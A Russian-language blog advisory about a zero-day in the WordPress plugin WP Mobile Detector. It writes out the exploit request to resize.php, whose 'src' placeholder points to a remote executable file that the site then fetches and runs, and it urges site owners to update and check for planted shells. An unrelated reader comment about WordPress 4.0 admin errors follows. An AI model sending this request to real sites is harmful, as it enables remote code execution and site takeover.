В одном известном плагине Wordpress была обнаружена уязвимость нулевого дня. Первые атаки на WP Mobile Detector зафиксированы с 27 мая, однако обнародована критическая уязвимость была лишь 31, и буквально несколько часов назад была выпущена новая версия, закрывающая дыру.
Уязвимость в WP Mobile Detector относится к критической, так как позволяет исполнять любой произвольный код с удаленного сервера.
Виновато оказалось отсутствие фильтрации любых Get и Post запросов в файлах resize.php и timthumb.php
В результате можно загрузить и исполнить любой внешний код простым запросом
/wp-content/plugins/wp-mobile-detector/resize.php?src=MyExploit
где в MyExploit надо поставить ссылку для исполняемого файла.
Уязвимы все версии WP Mobile Detector 3.х до 3.6
Всем вебмастерам на Wordpress советую проверить наличие WP Mobile Detector в списке установленных, и если уязвимый плагин находится на сайте, обязательно обновить его и проверить сайт на вирусы - хакеры могли занести шеллы на сайт, для эксплуатации в своих корыстных целях позднее. К тому же, большинство взломов характеризовалось сео-спамом, а такое лучше заранее предотвратить, чем потом потратить месяцы на восстановление результата.
Этот пример в очередной раз показывает, насколько надо быть осторожным в выборе сторонних плагинов, а также о преждевременной защите своих сайтов.
Дело в том, что после очередного автоматического обновления версии движка, а точнее после установки версии 4.0, появилось несколько ошибок в админке сайта, а именно при заходе на страницу внешний вид-настройка темы, выдаёт ошибку, а дословно "Страница не работает, сайт пока не может обработать этот запрос", в общем если я хочу сменить тему или подредактироват ь её, то теперь этого не сделать, да ещё и ошибка в видимой части сайта, появилась странная надпись вместо удалённой страницы, под шапкой, хотя её вообще быть не должно. Пробовала переустановить версию в ручную, но ничего не изменилось. Помогите решить данную проблему! Спасибо!
Поменять тему можно через базу данных.
Также можно сделать полную копию сайта с бд и установить чистую версию вордпресса и новую тему, и потом переносить все данные.
RSS лента комментариев этой записи